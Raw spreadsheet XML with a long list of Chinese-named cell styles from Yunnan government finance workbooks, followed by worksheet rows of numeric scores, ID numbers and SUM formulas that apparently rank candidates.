    <cellStyle name="差_2009年一般性转移支付标准工资_~4190974" xfId="328"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_~5676413" xfId="329"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_不用软件计算9.1不考虑经费管理评价xl" xfId="330"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_地方配套按人均增幅控制8.30xl" xfId="331"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_地方配套按人均增幅控制8.30一般预算平均增幅、人均可用财力平均增幅两次控制、社会治安系数调整、案件数调整xl" xfId="332"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_地方配套按人均增幅控制8.31（调整结案率后）xl" xfId="333"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_奖励补助测算5.22测试" xfId="334"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_奖励补助测算5.23新" xfId="335"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_奖励补助测算5.24冯铸" xfId="336"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_奖励补助测算7.23" xfId="337"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_奖励补助测算7.25" xfId="338"/>
    <cellStyle name="差_2009年一般性转移支付标准工资_奖励补助测算7.25 (version 1) (version 1)" xfId="339"/>
    <cellStyle name="差_2、土地面积、人口、粮食产量基本情况" xfId="340"/>
    <cellStyle name="差_530623_2006年县级财政报表附表" xfId="341"/>
    <cellStyle name="差_530629_2006年县级财政报表附表" xfId="342"/>
    <cellStyle name="差_5334_2006年迪庆县级财政报表附表" xfId="343"/>
    <cellStyle name="差_Book1" xfId="344"/>
    <cellStyle name="差_Book1_1" xfId="345"/>
    <cellStyle name="差_Book2" xfId="346"/>
    <cellStyle name="差_M01-2(州市补助收入)" xfId="347"/>
    <cellStyle name="差_M03" xfId="348"/>
    <cellStyle name="差_~4190974" xfId="349"/>
    <cellStyle name="差_~5676413" xfId="350"/>
    <cellStyle name="差_三季度－表二" xfId="351"/>
    <cellStyle name="差_下半年禁吸戒毒经费1000万元" xfId="352"/>
    <cellStyle name="差_下半年禁毒办案经费分配2544.3万元" xfId="353"/>
    <cellStyle name="差_不用软件计算9.1不考虑经费管理评价xl" xfId="354"/>
    <cellStyle name="差_业务工作量指标" xfId="355"/>
    <cellStyle name="差_丽江汇总" xfId="356"/>
    <cellStyle name="差_义务教育阶段教职工人数（教育厅提供最终）" xfId="357"/>
    <cellStyle name="差_云南农村义务教育统计表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指标五" xfId="377"/>
    <cellStyle name="差_指标四" xfId="378"/>
    <cellStyle name="差_教师绩效工资测算表（离退休按各地上报数测算）2009年1月1日" xfId="379"/>
    <cellStyle name="差_教育厅提供义务教育及高中教师人数（2009年1月6日）" xfId="380"/>
    <cellStyle name="差_文体广播部门" xfId="381"/>
    <cellStyle name="差_检验表" xfId="382"/>
    <cellStyle name="差_检验表（调整后）" xfId="383"/>
    <cellStyle name="差_汇总" xfId="384"/>
    <cellStyle name="差_汇总-县级财政报表附表" xfId="385"/>
    <cellStyle name="差_第一部分：综合全" xfId="386"/>
    <cellStyle name="差_第五部分(才淼、饶永宏）" xfId="387"/>
    <cellStyle name="差_财政供养人员" xfId="388"/>
    <cellStyle name="差_财政支出对上级的依赖程度" xfId="389"/>
    <cellStyle name="差_高中教师人数（教育厅1.6日提供）" xfId="390"/>
    <cellStyle name="常规 10" xfId="391"/>
    <cellStyle name="常规 12" xfId="392"/>
    <cellStyle name="常规 13" xfId="393"/>
    <cellStyle name="常规 14" xfId="394"/>
    <cellStyle name="常规 16" xfId="395"/>
    <cellStyle name="常规 17" xfId="396"/>
    <cellStyle name="常规 18" xfId="397"/>
    <cellStyle name="常规 19" xfId="398"/>
    <cellStyle name="常规 2" xfId="399"/>
    <cellStyle name="常规 2 2" xfId="400"/>
    <cellStyle name="常规 2 2 2" xfId="401"/>
    <cellStyle name="常规 2 3" xfId="402"/>
    <cellStyle name="常规 2 4" xfId="403"/>
    <cellStyle name="常规 2 5" xfId="404"/>
    <cellStyle name="常规 2 6" xfId="405"/>
    <cellStyle name="常规 2 7" xfId="406"/>
    <cellStyle name="常规 2 8" xfId="407"/>
    <cellStyle name="常规 20" xfId="408"/>
    <cellStyle name="常规 21" xfId="409"/>
    <cellStyle name="常规 22" xfId="410"/>
    <cellStyle name="常规 23" xfId="411"/>
    <cellStyle name="常规 24" xfId="412"/>
    <cellStyle name="常规 25" xfId="413"/>
    <cellStyle name="常规 26" xfId="414"/>
    <cellStyle name="常规 29" xfId="415"/>
    <cellStyle name="常规 2_Book1" xfId="416"/>
    <cellStyle name="常规 3" xfId="417"/>
    <cellStyle name="常规 32" xfId="418"/>
    <cellStyle name="常规 34" xfId="419"/>
    <cellStyle name="常规 35" xfId="420"/>
    <cellStyle name="常规 36" xfId="421"/>
    <cellStyle name="常规 37" xfId="422"/>
    <cellStyle name="常规 38" xfId="423"/>
    <cellStyle name="常规 4" xfId="424"/>
    <cellStyle name="常规 5" xfId="425"/>
    <cellStyle name="常规 6" xfId="426"/>
    <cellStyle name="常规 7" xfId="427"/>
    <cellStyle name="常规 8" xfId="428"/>
    <cellStyle name="常规 9" xfId="429"/>
    <cellStyle name="常规_norma1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1_Book1" xfId="436"/>
    <cellStyle name="强调文字颜色 2" xfId="437"/>
    <cellStyle name="强调文字颜色 2 2" xfId="438"/>
    <cellStyle name="强调文字颜色 2_Book1" xfId="439"/>
    <cellStyle name="强调文字颜色 3" xfId="440"/>
    <cellStyle name="强调文字颜色 3 2" xfId="441"/>
    <cellStyle name="强调文字颜色 3_Book1" xfId="442"/>
    <cellStyle name="强调文字颜色 4" xfId="443"/>
    <cellStyle name="强调文字颜色 4 2" xfId="444"/>
    <cellStyle name="强调文字颜色 4_Book1" xfId="445"/>
    <cellStyle name="强调文字颜色 5" xfId="446"/>
    <cellStyle name="强调文字颜色 5 2" xfId="447"/>
    <cellStyle name="强调文字颜色 5_Book1" xfId="448"/>
    <cellStyle name="强调文字颜色 6" xfId="449"/>
    <cellStyle name="强调文字颜色 6 2" xfId="450"/>
    <cellStyle name="强调文字颜色 6_Book1" xfId="451"/>
    <cellStyle name="归盒啦_95" xfId="452"/>
    <cellStyle name="捠壿 [0.00]_Region Orders (2)" xfId="453"/>
    <cellStyle name="捠壿_Region Orders (2)" xfId="454"/>
    <cellStyle name="数字" xfId="455"/>
    <cellStyle name="数量" xfId="456"/>
    <cellStyle name="日期" xfId="457"/>
    <cellStyle name="昗弨_Pacific Region P&amp;L" xfId="458"/>
    <cellStyle name="普通_ 白土" xfId="459"/>
    <cellStyle name="未定义" xfId="460"/>
    <cellStyle name="标题" xfId="461"/>
    <cellStyle name="标题 1" xfId="462"/>
    <cellStyle name="标题 1 2" xfId="463"/>
    <cellStyle name="标题 2" xfId="464"/>
    <cellStyle name="标题 2 2" xfId="465"/>
    <cellStyle name="标题 3" xfId="466"/>
    <cellStyle name="标题 3 2" xfId="467"/>
    <cellStyle name="标题 4" xfId="468"/>
    <cellStyle name="标题 4 2" xfId="469"/>
    <cellStyle name="标题 5" xfId="470"/>
    <cellStyle name="标题1" xfId="471"/>
    <cellStyle name="样式 1" xfId="472"/>
    <cellStyle name="检查单元格" xfId="473"/>
    <cellStyle name="检查单元格 2" xfId="474"/>
    <cellStyle name="检查单元格_Book1" xfId="475"/>
    <cellStyle name="汇总" xfId="476"/>
    <cellStyle name="汇总 2" xfId="477"/>
    <cellStyle name="汇总_Book1" xfId="478"/>
    <cellStyle name="注释" xfId="479"/>
    <cellStyle name="注释 2" xfId="480"/>
    <cellStyle name="注释_Book1" xfId="481"/>
    <cellStyle name="烹拳 [0]_ +Foil &amp; -FOIL &amp; PAPER" xfId="482"/>
    <cellStyle name="烹拳_ +Foil &amp; -FOIL &amp; PAPER" xfId="483"/>
    <cellStyle name="百分比 2" xfId="484"/>
    <cellStyle name="百分比 3" xfId="485"/>
    <cellStyle name="百分比 4" xfId="486"/>
    <cellStyle name="编号" xfId="487"/>
    <cellStyle name="表标题" xfId="488"/>
    <cellStyle name="解释性文本" xfId="489"/>
    <cellStyle name="解释性文本 2" xfId="490"/>
    <cellStyle name="解释性文本_Book1" xfId="491"/>
    <cellStyle name="警告文本" xfId="492"/>
    <cellStyle name="警告文本 2" xfId="493"/>
    <cellStyle name="警告文本_Book1" xfId="494"/>
    <cellStyle name="计算" xfId="495"/>
    <cellStyle name="计算 2" xfId="496"/>
    <cellStyle name="计算_Book1" xfId="497"/>
    <cellStyle name="超级链接" xfId="498"/>
    <cellStyle name="输入" xfId="499"/>
    <cellStyle name="输入 2" xfId="500"/>
    <cellStyle name="输入_Book1" xfId="501"/>
    <cellStyle name="输出" xfId="502"/>
    <cellStyle name="输出 2" xfId="503"/>
    <cellStyle name="输出_Book1" xfId="504"/>
    <cellStyle name="适中" xfId="505"/>
    <cellStyle name="适中 2" xfId="506"/>
    <cellStyle name="适中_Book1" xfId="507"/>
    <cellStyle name="部门" xfId="508"/>
    <cellStyle name="钎霖_4岿角利" xfId="509"/>
    <cellStyle name="链接单元格" xfId="510"/>
    <cellStyle name="链接单元格 2" xfId="511"/>
    <cellStyle name="链接单元格_Book1" xfId="512"/>
    <cellStyle name="霓付 [0]_ +Foil &amp; -FOIL &amp; PAPER" xfId="513"/>
    <cellStyle name="霓付_ +Foil &amp; -FOIL &amp; PAPER" xfId="514"/>
    <cellStyle name="콤마 [0]_BOILER-CO1" xfId="515"/>
    <cellStyle name="콤마_BOILER-CO1" xfId="516"/>
    <cellStyle name="통화 [0]_BOILER-CO1" xfId="517"/>
    <cellStyle name="통화_BOILER-CO1" xfId="518"/>
    <cellStyle name="표준_0N-HANDLING " xfId="5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true" outlineLevel="0" max="2" min="2" style="0" width="6.62"/>
    <col collapsed="false" customWidth="true" hidden="true" outlineLevel="0" max="3" min="3" style="2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C1" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" customFormat="false" ht="14.2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3" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C4" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="5" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C5" s="2" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="6" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C6" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C7" s="2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C8" s="2" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="9" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C9" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C10" s="3" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="11" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C11" s="3" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C12" s="3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C13" s="2" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="14" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C14" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="15" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C15" s="3" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="16" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C16" s="3" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C17" s="3" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C18" s="3" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="19" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C19" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="20" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C20" s="3" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="21" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C21" s="2" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="22" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C22" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="23" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C23" s="3" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="24" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C24" s="3" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="25" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C25" s="2" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="26" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C26" s="3" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="27" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C27" s="3" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="28" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C28" s="3" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="29" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C29" s="3" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="30" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C30" s="3" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="31" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C31" s="3" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="32" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C32" s="3" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="33" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C33" s="3" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="34" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C34" s="3" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="35" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C35" s="2" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="36" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C36" s="3" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="37" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C37" s="2" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="38" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C38" s="2" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="39" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C39" s="2" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="40" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C40" s="2" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="41" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C41" s="2" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="42" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C42" s="2" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="43" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C43" s="3" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="44" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C44" s="3" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="45" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C45" s="3" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="46" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C46" s="2" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="47" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C47" s="2" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="48" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C48" s="2" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="49" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C49" s="2" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="50" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C50" s="2" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="51" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C51" s="3" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="52" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C52" s="2" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="53" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C53" s="3" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="54" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C54" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="55" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C55" s="3" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="56" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C56" s="3" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="57" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C57" s="3" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="58" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C58" s="3" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="59" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C59" s="3" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="60" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C60" s="3" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="61" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C61" s="3" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="62" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C62" s="3" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="63" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C63" s="2" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="64" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C64" s="2" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="65" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C65" s="2" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="66" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C66" s="2" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="67" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C67" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="68" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C68" s="3" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="69" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C69" s="3" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="70" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C70" s="3" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="71" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C71" s="3" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="72" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C72" s="3" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="73" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C73" s="3" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="74" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C74" s="2" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="75" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C75" s="3" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="76" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C76" s="3" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="77" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C77" s="2" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="78" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C78" s="3" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="79" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C79" s="3" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="80" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C80" s="2" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="81" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C81" s="3" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="82" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C82" s="2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55" zoomScaleNormal="255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4"/>
  <sheetViews>
    <sheetView showFormulas="false" showGridLines="true" showRowColHeaders="true" showZeros="true" rightToLeft="false" tabSelected="true" showOutlineSymbols="true" defaultGridColor="true" view="normal" topLeftCell="A712" colorId="64" zoomScale="115" zoomScaleNormal="115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8.24"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="2" min="2" style="4" width="9.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="3" min="3" style="4" width="19.74"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="4" min="4" style="4" width="15.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="5" min="5" style="5" width="7.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="6" min="6" style="5" width="9.87"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="7" min="7" style="4" width="4.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="8" min="8" style="4" width="5.87"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="9" min="9" style="4" width="5.11"/>
    <col collapsed="false" customWidth="false" hidden="false" outlineLevel="0" max="257" min="10" style="4" width="8.99"/>
  </cols>
  <sheetData>
    <row r="1" s="7" customFormat="true" ht="25.5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8" t="s">
        <v>75</v>
      </c>
      <c r="B2" s="8" t="s">
        <v>76</v>
      </c>
      <c r="C2" s="8" t="s">
        <v>77</v>
      </c>
      <c r="D2" s="8" t="s">
        <v>78</v>
      </c>
      <c r="E2" s="8" t="s">
        <v>79</v>
      </c>
      <c r="F2" s="8" t="s">
        <v>80</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>81</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>82</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="3" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A3" s="8" t="n">
        <v>4100007</v>
      </c>
      <c r="B3" s="8" t="n">
        <v>1314010306</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D3" s="8" t="s">
        <v>85</v>
      </c>
      <c r="E3" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F3" s="8" t="n">
        <v>73</v>
      </c>
      <c r="G3" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H3" s="8" t="n">
        <f aca="false">SUM(E3:G3)</f>
        <v>138.8</v>
      </c>
      <c r="I3" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A4" s="8" t="n">
        <v>4100007</v>
      </c>
      <c r="B4" s="8" t="n">
        <v>1314010307</v>
      </c>
      <c r="C4" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D4" s="8" t="s">
        <v>85</v>
      </c>
      <c r="E4" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F4" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G4" s="8"/>
      <c r="H4" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I4" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="5" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A5" s="8" t="n">
        <v>4100013</v>
      </c>
      <c r="B5" s="8" t="n">
        <v>1314010308</v>
      </c>
      <c r="C5" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D5" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E5" s="8" t="n">
        <v>64</v>
      </c>
      <c r="F5" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="G5" s="8"/>
      <c r="H5" s="8" t="n">
        <f aca="false">SUM(E5:G5)</f>
        <v>112.6</v>
      </c>
      <c r="I5" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A6" s="8" t="n">
        <v>4100013</v>
      </c>
      <c r="B6" s="8" t="n">
        <v>1314010309</v>
      </c>
      <c r="C6" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D6" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E6" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F6" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="G6" s="8"/>
      <c r="H6" s="8" t="n">
        <f aca="false">SUM(E6:G6)</f>
        <v>102</v>
      </c>
      <c r="I6" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A7" s="8" t="n">
        <v>4100013</v>
      </c>
      <c r="B7" s="8" t="n">
        <v>1314010310</v>
      </c>
      <c r="C7" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D7" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E7" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F7" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G7" s="8"/>
      <c r="H7" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I7" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="8" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A8" s="8" t="n">
        <v>4100015</v>
      </c>
      <c r="B8" s="8" t="n">
        <v>1314010313</v>
      </c>
      <c r="C8" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D8" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E8" s="8" t="n">
        <v>71.8</v>
      </c>
      <c r="F8" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="G8" s="8"/>
      <c r="H8" s="8" t="n">
        <f aca="false">SUM(E8:G8)</f>
        <v>135.6</v>
      </c>
      <c r="I8" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="9" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A9" s="8" t="n">
        <v>4100015</v>
      </c>
      <c r="B9" s="8" t="n">
        <v>1314010311</v>
      </c>
